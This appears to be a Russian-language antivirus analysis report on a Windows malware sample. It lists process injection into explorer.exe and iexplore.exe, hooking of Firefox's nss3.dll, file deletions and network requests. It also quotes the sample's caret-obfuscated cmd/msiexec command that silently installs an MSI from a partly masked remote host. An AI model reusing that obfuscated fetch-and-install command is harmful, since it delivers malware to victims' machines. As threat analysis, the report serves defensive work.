Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://un####slashclub.com/jss/binn.msi /qn
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
следующие пользовательские процессы:
- iexplore.exe
Перехватывает функции
в браузерах
- Процесс firefox.exe, модуль nss3.dll
Изменения в файловой системе
Удаляет следующие файлы
- %WINDIR%\installer\msid3a1.tmp
Сетевая активность
TCP
Запросы HTTP GET
- http://un####slashclub.com/jss/binn.msi
UDP
- DNS ASK un####slashclub.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msid3a1.tmp'
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://un####slashclub.com/jss/binn.msi /qn' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\msiexec.exe' /i http://un####slashclub.com/jss/binn.msi /qn
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSID3A1.tmp"
